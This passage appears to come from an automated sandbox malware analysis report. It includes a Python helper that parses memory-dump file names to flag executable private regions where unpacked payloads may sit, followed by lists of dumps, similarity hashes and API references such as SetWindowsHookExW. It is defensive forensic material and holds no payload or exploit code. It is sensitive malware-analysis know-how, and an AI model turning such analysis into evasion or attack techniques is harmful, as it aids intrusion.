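    pid: int
    analysis_round: int
    dump_id: str
    base: int
    protect: int
    field6: int      # meaning not documented on the page; kept raw
    mem_type: int
    module_ref: int  # assumed: reference to the module the region belongs to (0 = none)

    @property
    def protect_name(self) -> str:
        # mask off modifier bits such as PAGE_GUARD before the lookup
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    def suspicious(self) -> bool:
        """Executable memory that is not an image mapping is where unpacked or
        decrypted code ends up; writable on top of that is the classic
        self-modifying shellcode region."""
        return self.executable and self.mem_type != MEM_IMAGE


def parse_dump_name(name: str) -> DumpRegion:
    m = _NAME.match(name.strip())
    if m is None:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    pid, rnd, dump_id, base, protect, field6, mem_type, module_ref = m.groups()
    return DumpRegion(int(pid, 16), int(rnd, 16), dump_id, int(base, 16),
                      int(protect, 16), int(field6, 16), int(mem_type, 16),
                      int(module_ref, 16))


def triage(names):
    """Parse every name and return the regions worth pulling first, RWX ones ahead of RX."""
    hits = [r for r in map(parse_dump_name, names) if r.suspicious()]
    return sorted(hits, key=lambda r: (not r.writable, r.pid, r.base))


# Names copied from the "Memory Dump Source" entries on this page.
REPORT_DUMPS = [
    "00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp",
    "00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in map(parse_dump_name, REPORT_DUMPS):
        flag = "  <-- unpacked/decrypted code candidate" if r.suspicious() else ""
        print(f"pid {r.pid} base 0x{r.base:08X} {r.protect_name:<22} {r.type_name:<11}{flag}")
```

                                                                      Run as a script it prints one line per dump and marks only the process 3 region at 0x36910000. triage() is the part to keep when working through a full report: a MEM_PRIVATE or MEM_MAPPED region with an execute bit set is where to start looking for the decrypted payload and its configuration, and a PAGE_EXECUTE_READWRITE one is the dump to open first.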

                                                                      Control-flow Graph

                                                                      control_flow_graph for the function at 36914a90 (basic blocks 36914a90 through 3691501c-369150a3; the block edge list and the executed/not-executed colouring are data for the report viewer's graph widget and are omitted here). No call targets appear in the block list, which matches the empty API ID above.
Strings
Memory Dump Source
• Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID: 0P$0P
• API String ID: 0-576979913
• Opcode ID: b688d2ca0960958f9a0bd8baddf1ac0f38c9885fe5e7db34d4892f6fab5ecd36
• Instruction ID: 2b8aecf047a43c6c7ed7f0c71883314fa79bc549ee16666bcd42cdeeb2ef0600
• Opcode Fuzzy Hash: b688d2ca0960958f9a0bd8baddf1ac0f38c9885fe5e7db34d4892f6fab5ecd36
• Instruction Fuzzy Hash: 13F1D274B00319CFEB248F66885472E77A6BB85B45F758829D8869B391CB34DC41CBE2

Control-flow Graph
Memory Dump Source
• Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e8b6d282258f25b14f2e787328390f400968d86555747be77b7b85529fdc066
• Instruction ID: 66c4d767942a4cad80a8dd9e02222ea0fe6e17b883d7141d4e29680a24506e59
• Opcode Fuzzy Hash: 4e8b6d282258f25b14f2e787328390f400968d86555747be77b7b85529fdc066
• Instruction Fuzzy Hash: E1F18D74A00308CFEB04CFA9C944BDDBBF1BF9A314F548169E409AB261DB75A945CF81
Memory Dump Source
• Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 45af1c5d6ff71f6d1106b11f862249f46b835681ab594cb833cc725752ec5067
• Instruction ID: 5e11b69436310de5c77ffb9f7ee79301df2f3fb1c7b71f82a0ab6f17e62ec10e
• Opcode Fuzzy Hash: 45af1c5d6ff71f6d1106b11f862249f46b835681ab594cb833cc725752ec5067
• Instruction Fuzzy Hash: E5123A74A00219DFEB05CFA9C884A9DBBF6BF49344F75806AE815AB361DB34DC41CB91

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID: 0P$0P$0P$0P$0P
• API String ID: 0-2254592918
• Opcode ID: 49144c91d8714f772bc1e971b989b12fd350b6ed5573aeed9fb939d5979fc40a
• Instruction ID: c598b2967640850fbc20a4666935d32a94e0c760e6aec92c938d71e9e22a4355
• Opcode Fuzzy Hash: 49144c91d8714f772bc1e971b989b12fd350b6ed5573aeed9fb939d5979fc40a
• Instruction Fuzzy Hash: 34F1E034B002189FEB05AF64C854B6E7BA6BB89391F348429E506DF391CF74DD82CB95

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 0015B23E
• GetCurrentThread.KERNEL32 ref: 0015B27B
• GetCurrentProcess.KERNEL32 ref: 0015B2B8
• GetCurrentThreadId.KERNEL32 ref: 0015B311
Memory Dump Source
• Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 0f383d1b7e29255de871d0ce60fa6bb0081dbb1abb8df0c153deed28f0e8cfc5
• Instruction ID: c437db99b2476e2c591c59dba3c436b6fd3f1a80d3bfa917c8e512e891e31721
• Opcode Fuzzy Hash: 0f383d1b7e29255de871d0ce60fa6bb0081dbb1abb8df0c153deed28f0e8cfc5
• Instruction Fuzzy Hash: BA5154B0904709CFDB14CFAAD588BEEBBF1AF89300F248419E419BB260D7746945CF66

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 0015B23E
• GetCurrentThread.KERNEL32 ref: 0015B27B
• GetCurrentProcess.KERNEL32 ref: 0015B2B8
• GetCurrentThreadId.KERNEL32 ref: 0015B311
Memory Dump Source
• Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 57907530438599f7fe2db21bc2a92a187d4bc62c43dea50bd67bb2d7942eb1e8
• Instruction ID: c437db99b2476e2c591c59dba3c436b6fd3f1a80d3bfa917c8e512e891e31721
• Opcode Fuzzy Hash: 57907530438599f7fe2db21bc2a92a187d4bc62c43dea50bd67bb2d7942eb1e8
• Instruction Fuzzy Hash: BA5154B0904709CFDB14CFAAD588BEEBBF1AF89300F248419E419BB260D7746945CF66

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID: 0P$0P
• API String ID: 0-576979913
• Opcode ID: 8ead7fa6ee07324739afdecc664bd5877db06abb7367e99e864028929b7728ef
• Instruction ID: cf2577d8ee7f07b0a1d04ffda99060adecdcd36504cd6dd77c6a89c251503a89
• Opcode Fuzzy Hash: 8ead7fa6ee07324739afdecc664bd5877db06abb7367e99e864028929b7728ef
• Instruction Fuzzy Hash: 80518731B082591FDB06AB38881864E7B669FC2210F78426AD045CF392CF758C47C3D5

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
Similarity
• API ID:
• String ID: 0P$0P
• API String ID: 0-576979913
• Opcode ID: e54086e60e8eb9f9f6e24fefd939aa28b7bfc766f149c9d5da740b29524fac19
• Instruction ID: 02d72eff24e168c23fec976c5a76187fef5f7bfc77cd654e9af18db01cbc3a85
• Opcode Fuzzy Hash: e54086e60e8eb9f9f6e24fefd939aa28b7bfc766f149c9d5da740b29524fac19
• Instruction Fuzzy Hash: 98312B75F002145BDB09A7B588643AF7AA36FC6240B38813DD446EB396DD758C028BD5
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37896A42
Memory Dump Source
• Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: c9e598b2610410843d36566cddecc7d4dba27f476c503420f4e8d5677951b35a
• Instruction ID: 63256e2a4ec0d3ae3ea41f708828854ace7bf2e60783370666d50c6a4fda8c96
• Opcode Fuzzy Hash: c9e598b2610410843d36566cddecc7d4dba27f476c503420f4e8d5677951b35a
• Instruction Fuzzy Hash: 8651CFB5D003499FDB14CF9AC984ADEBBB5FF89350F64812AE818AB210D770A845CF90
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37896A42
Memory Dump Source
• Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: f3d5400e48b5c4ef2d2e45920d0172aa01e9a7cf0745f2212405c26ae441ca91
• Instruction ID: fe1abd470de3e390fc32b513e0caef608ef6bbd959ea29276090b384b15f6009
• Opcode Fuzzy Hash: f3d5400e48b5c4ef2d2e45920d0172aa01e9a7cf0745f2212405c26ae441ca91
• Instruction Fuzzy Hash: FA41B0B5D003499FDB14CF9AC984ADEBBF5FF89350F64812AE818AB210D770A845CF90
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 37899681
Memory Dump Source
• Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 12c7322ebfe79db6118956cfe6687d16574f5714f59a14f5098fbc664ebbdb30
• Instruction ID: 4c947b69f809d8570b7f2f8a4978efdd897a26e6cec9bdd6454c2cfcef3d2dca
• Opcode Fuzzy Hash: 12c7322ebfe79db6118956cfe6687d16574f5714f59a14f5098fbc664ebbdb30
• Instruction Fuzzy Hash: 0D413AB9900309DFDB14CF99C844BAABBF5FF99310F25C859D518AB321D775A842CBA0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0015B48F
Memory Dump Source
• Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 9df4c1608635c0b68067495ffff02c54021b03a96f3c8110f589aed4ba31c46c
• Instruction ID: 40411f43278d1e5d3870b3c977249b9e39d3d06a48b15f7dff6a488a735e8b7f
• Opcode Fuzzy Hash: 9df4c1608635c0b68067495ffff02c54021b03a96f3c8110f589aed4ba31c46c
• Instruction Fuzzy Hash: 4321E3B5900248EFDB20CFAAD985AEEBBF4EB48310F14841AE955A7310D374A944CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0015B48F
Memory Dump Source
• Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: bb0cb19df8a467a9a9691ef82575ee7e52cb94833d4f9d95047d594b841143a2
• Instruction ID: 28bb56f83c2cfb7b237c60ee2acfbb5913a48c0e79de8a849da728722872b9ef
• Opcode Fuzzy Hash: bb0cb19df8a467a9a9691ef82575ee7e52cb94833d4f9d95047d594b841143a2
• Instruction Fuzzy Hash: E321E4B59003489FDB10CFAAD984ADEBBF4EB48310F14841AE954A7310D374A944CF65
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00156383
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 5405b38a130b67236df8ac65147a0a89bd23be20065c6e2bb27eac3dea3a49f1
                                                                      • Instruction ID: 0333323c220ce9de8e62c8c4850b102c07cb2e6d18c8082a109946c1f084649d
                                                                      • Opcode Fuzzy Hash: 5405b38a130b67236df8ac65147a0a89bd23be20065c6e2bb27eac3dea3a49f1
                                                                      • Instruction Fuzzy Hash: F22118B5D002098FDB24CF9AC844BEEBBF5FF88310F148419D469A7250C774A944CFA1
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00156383
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 85e01395248e5368e081e5c4e383a72e76e0d86aca3d194d5963308744a26054
                                                                      • Instruction ID: 0333323c220ce9de8e62c8c4850b102c07cb2e6d18c8082a109946c1f084649d
                                                                      • Opcode Fuzzy Hash: 85e01395248e5368e081e5c4e383a72e76e0d86aca3d194d5963308744a26054
                                                                      • Instruction Fuzzy Hash: F22118B5D002098FDB24CF9AC844BEEBBF5FF88310F148419D469A7250C774A944CFA1
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,3789C082,00000000,00000000,35630D08,345C721C), ref: 3789C4D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: a23f0adf2cfe2cf936c52d2f96667ec431dca00d072789fdbbb09a37cd7d9f7e
                                                                      • Instruction ID: 205275637dd730c9c8bc8412715ae9d3da6b164ab2497ef10fa16e41d29e5817
                                                                      • Opcode Fuzzy Hash: a23f0adf2cfe2cf936c52d2f96667ec431dca00d072789fdbbb09a37cd7d9f7e
                                                                      • Instruction Fuzzy Hash: 711117B59003099FDB20CF9AD845BEEBBF4EB49320F10842AE958A7251D374A554CFA5
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,3789C082,00000000,00000000,35630D08,345C721C), ref: 3789C4D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: 7ac0e6309a7cdae17fc710471599dcdff677b3d2d46467c0d0689a281361af24
                                                                      • Instruction ID: 65b1daa9a375ce3ec326b15c05c8c51ca2a414d825f21577183cec20a16c0f19
                                                                      • Opcode Fuzzy Hash: 7ac0e6309a7cdae17fc710471599dcdff677b3d2d46467c0d0689a281361af24
                                                                      • Instruction Fuzzy Hash: 361159B5D043099FDB20CF9AD440BEEBBF4EB09310F10802AE954A7211C374A944CFA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P
                                                                      • API String ID: 0-2168752328
                                                                      • Opcode ID: 5e25cdfbc289050c993c6ff735699f693d20babb07cc59c7bee8da793353289c
                                                                      • Instruction ID: f614ac1f29b7cb2a9ecdb816b9111605ba50cdcd5671ffbfc164c04bbd6ad3f7
                                                                      • Opcode Fuzzy Hash: 5e25cdfbc289050c993c6ff735699f693d20babb07cc59c7bee8da793353289c
                                                                      • Instruction Fuzzy Hash: 1231D235B042149FEB059F65D854BAE7BB6EFCD650F244129E506EB391CF359C02CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0060d96025896fe7612dcceff11a3fc878962dbcc72dd37a5791ccd9704f6dc7
                                                                      • Instruction ID: 7be03426acfcf820034c393c543fb9e8dfd3caf7c763864982908d5edc847a54
                                                                      • Opcode Fuzzy Hash: 0060d96025896fe7612dcceff11a3fc878962dbcc72dd37a5791ccd9704f6dc7
                                                                      • Instruction Fuzzy Hash: 0E31B730B04258DFDB15AB39C4606AE3BB6AFCA304F31406DD441AB395DF358C06CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a740c83be5df28067e9953c4d3dcad49e5de45bcc23f40faf9e9f992cbbec7f
                                                                      • Instruction ID: 6ca700e39196745165fefe71ba4d9f99284a988183fcc0068b2176b0ab6dc0f1
                                                                      • Opcode Fuzzy Hash: 2a740c83be5df28067e9953c4d3dcad49e5de45bcc23f40faf9e9f992cbbec7f
                                                                      • Instruction Fuzzy Hash: E1E11975E00219CFDB01CFA9C984A9DBBF6BF4D710B6680A9E415AB361CB35EC41CB64
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05aaf04a648bc78a854b833859df1439b4ffdf40d3cdfd5fba1a0c2729b053a4
                                                                      • Instruction ID: c46f22093c6e066ec34f08e1579657bb34b699b09988ef1fa1e48aff8fa1b4a7
                                                                      • Opcode Fuzzy Hash: 05aaf04a648bc78a854b833859df1439b4ffdf40d3cdfd5fba1a0c2729b053a4
                                                                      • Instruction Fuzzy Hash: 79B1B138B10308DFEB449B26D85176E77A6BBC8354F354069E816EB391DF76AD06CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bfb3fcc3d7f9a778d9368db65b805d7fbd734c6565236a57030ad14aa0c63c4e
                                                                      • Instruction ID: 412e6b1716d49d8609ec63450c05d3b37d33e3cc1156785f16a002c19cd36854
                                                                      • Opcode Fuzzy Hash: bfb3fcc3d7f9a778d9368db65b805d7fbd734c6565236a57030ad14aa0c63c4e
                                                                      • Instruction Fuzzy Hash: F0819374E006098FEB05EFA9C480A9AB7B5FF49314B7181AAD415EF361CB31EC81CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f58abc4408f86ec34da30b9c01f75f6653b1c068afb784e3b50286db5c10e686
                                                                      • Instruction ID: 67bf2f3e59b07d49b497d16dbd22d9358acddc5569fbf8dd24a4493be066fa71
                                                                      • Opcode Fuzzy Hash: f58abc4408f86ec34da30b9c01f75f6653b1c068afb784e3b50286db5c10e686
                                                                      • Instruction Fuzzy Hash: 0951B134B002089FEB099B76D85576E7AA3ABC9310F358428E816E7392DF798C45DB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d4f42ffebf242fd6a54e2bf40e35d2840846861ed11d11fe20210becf038d1d
                                                                      • Instruction ID: 00fad58f56856ba3acda944996d5eec03767ff5c1ecf890a2b7499b3df483478
                                                                      • Opcode Fuzzy Hash: 1d4f42ffebf242fd6a54e2bf40e35d2840846861ed11d11fe20210becf038d1d
                                                                      • Instruction Fuzzy Hash: 8E514B74B102089FEB14DB6AC858B5D7BF6BF89314F258169E405EB3A1CE75AC41CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df634880b45359cf6296e4cf78a108c2ba62b43b321c3fa2a26c90291c1f16a1
                                                                      • Instruction ID: 360b92e824369d945616a197383f52deabf73a82b4ab156cbd931fab275838c4
                                                                      • Opcode Fuzzy Hash: df634880b45359cf6296e4cf78a108c2ba62b43b321c3fa2a26c90291c1f16a1
                                                                      • Instruction Fuzzy Hash: 09414974B102049FDB05DB79C858B5DBBE2BF89314F258169E406EB3A1DE75EC41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cf11f5eb3d58ee036063e8bc006dbcb1001eb955b061285e8ffa857e35b3a4d
                                                                      • Instruction ID: 8e45052b2c0bd1d221d24f534d888a314a991268854bdb6e82cea027789ca30b
                                                                      • Opcode Fuzzy Hash: 5cf11f5eb3d58ee036063e8bc006dbcb1001eb955b061285e8ffa857e35b3a4d
                                                                      • Instruction Fuzzy Hash: 1941D0B19043498FEB01DF6AD84469AFFF4FF89314F29816AD408E7211EB75A805CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 242a1a276f781078a0f629db763433be75f2c2fa346bbb6ac958862c6bacbf89
                                                                      • Instruction ID: a8588d2d18ac6120e9c6472b3878e062acd77552c17a73843c37ae51e1b72c4b
                                                                      • Opcode Fuzzy Hash: 242a1a276f781078a0f629db763433be75f2c2fa346bbb6ac958862c6bacbf89
                                                                      • Instruction Fuzzy Hash: A7219F30B00218DFDB19AB3AC8606AE76B6BFC9704F31802DD502AB394DF359C46CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a66bb997af9fe394662f5381687d2b539c3585a2d2ebae759f8d187f98ef633d
                                                                      • Instruction ID: fb6bc531fe717c6ea2404659956befc5c0954122e872798df69d1bb6c8858e24
                                                                      • Opcode Fuzzy Hash: a66bb997af9fe394662f5381687d2b539c3585a2d2ebae759f8d187f98ef633d
                                                                      • Instruction Fuzzy Hash: F42146B1604304EFDB15DF50C9C0B2ABBA1FB8A314F24C56ED90A4F646C33BD846CA62
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35125e109bf6190d4f1904d0fb23808797d3a2f10ab53fbe07541237bb271322
                                                                      • Instruction ID: d9e5fd9eda7b613dfd93a6384a0542d89dfaaa3351c32e97f0414d3a850e87f7
                                                                      • Opcode Fuzzy Hash: 35125e109bf6190d4f1904d0fb23808797d3a2f10ab53fbe07541237bb271322
                                                                      • Instruction Fuzzy Hash: CC2104B1604300DFDB24DF60C5C0F2ABBA1EB85314F24C66ED90A4B652C376D847CA62
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc5ee8da39fcc1ae9411fbbb41ba488e849c944057e0aa1dc0ba2cd13efa4006
                                                                      • Instruction ID: 4ac46ba0194bc8fbe82e0178aa5d5f09007dc242484c3916c89816cbc19da26d
                                                                      • Opcode Fuzzy Hash: cc5ee8da39fcc1ae9411fbbb41ba488e849c944057e0aa1dc0ba2cd13efa4006
                                                                      • Instruction Fuzzy Hash: 0B11E939B00314ABFF19A6B55C117BE26575FC5250F248428FC25BF391DF7898018B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d77b068aec2a6d077249a01efc75fbe003049f2c7183a4c35fa993cb74019e3a
                                                                      • Instruction ID: af59d1d9e9a72a3f1a779fa54a2f5d185b0eb54c2def33dd4e0732b8b62bbb2d
                                                                      • Opcode Fuzzy Hash: d77b068aec2a6d077249a01efc75fbe003049f2c7183a4c35fa993cb74019e3a
                                                                      • Instruction Fuzzy Hash: DE110435B096568FDB066B29D86452EBB66FF8639176540AAE406CF391CF20DC01C7D0
                                                                      Memory Dump Source
